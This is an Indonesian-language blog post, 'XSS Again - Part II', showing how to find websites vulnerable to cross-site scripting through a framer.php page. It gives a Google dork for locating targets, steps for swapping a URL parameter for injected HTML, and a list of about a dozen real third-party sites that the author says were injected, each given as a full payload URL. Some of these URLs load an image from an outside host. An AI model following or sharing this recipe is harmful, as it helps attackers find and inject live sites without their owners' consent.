Saia yakin klo semuanya udah tau apa itu XSS, tpi klo msih belum tau, kalian bisa membaca artikel saia tentang XSS yg sudah saia posting sebelumnya disini. Kenapa saia menulis artikel tentang XSS again, karena kebetulan saia menemukan dork XSS yg baru (bagi saia sih walaupun sebenarnya dork ini udah lama). Ok, kita langsung aj ke TKP yah...
Dork : inurl:framer.php?SUB=
1. Seperti biasa, kita cari lewat bantuan om Google...
Wao, banyak sekali web yg bisa kita eksekusi.
2) Saia memilih salah satu website yaitu :
3) Lalu hapuslah script setelah tanda =
4) Lalu anda ganti dgn script HTML seperti brikut ini : <font+color=red+size=8>Q-Whil3</font>
5 ) Hingga akhirnya menjadi seprti dibawah ini :
6) Dan apa yg terjadi ???
BERHASIL
Berikut ini website lainnya yg berhasil saia Inject :
- http://www.visitenkarten-24.org/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
- http://www.ustctba.com/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
- http://www.fhrg.org/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
- http://www.islander-magazine.com/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
- http://www.semagix.com/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
- http://www.gpfoundation.com/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
- http://www.top10chart.org/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
- http://ferien.hausboot-24.org/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
- http://www.dfg-bonn.de/disallow/framer.php?data=<font+color=red+size=8>Q-Whil3</font>
- http://www.atlhomesearch.com/framer.php?url=http://point428.com/wp-content/uploads/2011/12/agusssssssfbd.jpg
- http://www.astutecomputing.com/demoapps/framer.php?src=http://point428.com/wp-content/uploads/2011/12/agusssssssfbd.jpg
- http://triggerfinger.com/framer.php?p=http://point428.com/wp-content/uploads/2011/12/agusssssssfbd.jpg
Selamet ber XSS ria :)
0 Response to "XSS Again - Part II"
Post a Comment